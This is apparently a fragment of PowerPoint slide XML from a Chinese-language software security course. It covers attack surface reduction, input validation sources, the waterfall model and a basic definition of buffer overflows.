              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基于密钥的安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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降低攻击面</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821180"/>
            <a:ext cx="10876915" cy="2280285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击面越小，安全风险</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>越小</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>取消不需要的功能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>增加对功能的安全防护</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6695440" y="1393190"/>
            <a:ext cx="2877820" cy="3100070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701040" y="4556760"/>
            <a:ext cx="10876280" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>示例：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>关闭不必要的API或服务接口，只保留对外开放的必要部分。通过API网关进行流量管理，确保只有授权请求可以访问特定接口。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定期对代码进行安全审计和静态分析，发现并修复潜在的安全漏洞。通过代码审查和同行评审，增强代码的安全性和可靠性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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分析软件攻击面</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559560"/>
            <a:ext cx="10876915" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分析产品功能的重要性（是否必须）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分析从哪里访问这些功能（本地&amp;远程）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分析访问权限（匿名&amp;经过认证）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2734945" y="3261995"/>
            <a:ext cx="5086350" cy="2905125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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降低攻击面策略</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821180"/>
            <a:ext cx="10876915" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>重要等级为低的功能：攻击面大，取消该功能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>重要等级为中的功能：攻击面大，设置为非默认开启，需要用户配置后才予以开启</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>重要等级为高的功能：攻击面大，关闭或限制一些接口方式，增加一些安全的保证措施或技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2414270" y="3677285"/>
            <a:ext cx="7362825" cy="2381250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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降低软件攻击面通常做法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487805" y="1325880"/>
            <a:ext cx="7461885" cy="5056505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现</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通用安全编码原则-验证输入</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159635" y="1641475"/>
            <a:ext cx="6096000" cy="258445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对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>所有输入数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>检查、验证及过滤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用软件的“数据防火墙”，避免恶意数据进入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么时候</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>最初接收数据时</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（第一次）使用数据时</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>采用黑名单或者白名单的方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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软件生命周期模型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>瀑布</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型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23825" y="1276985"/>
            <a:ext cx="6096000" cy="5247005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最早出现的软件开发模型，是传统软件开发方法的代表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>核心思想</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>按工序将问题简化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将功能的实现与设计分开</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不足</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>没有对开发周期后期发现错误做出相应的规定</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>没有迭代与反馈。瀑布模型对反馈没有涉及，所以对变化的客户需求非常不容易适应，瀑布就意味着没有回头路。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>只允许开发人员回溯一个阶段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>适用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>场景：需求固定，项目简单</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6487160" y="1398905"/>
            <a:ext cx="5271770" cy="4667250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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验证输入-常见输入源</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159635" y="1236980"/>
            <a:ext cx="7912100" cy="590804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命令行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数数量、数据格式、内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>环境变量</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>环境变量可能超出期望</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有的环境变量长度过长、内容篡改、格式不符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件及文件名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不信任可以被不可信用户控制的文件内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检查文件长度、格式、内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不同系统对文件名的要求也是不一样的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来自网络的数据是“高度不可信的”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据本身和网络包包头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其他</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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通用安全编码原则-避免缓冲区溢出</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787525" y="1591945"/>
            <a:ext cx="7912100" cy="216852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缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缓冲区：包含相同数据类型的实例的一个连续计算机内存块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>溢出：数据被添加到分配给该缓冲区的内存块之外</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>外部数据比目标空间大</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是一个非常普遍而且严重的问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
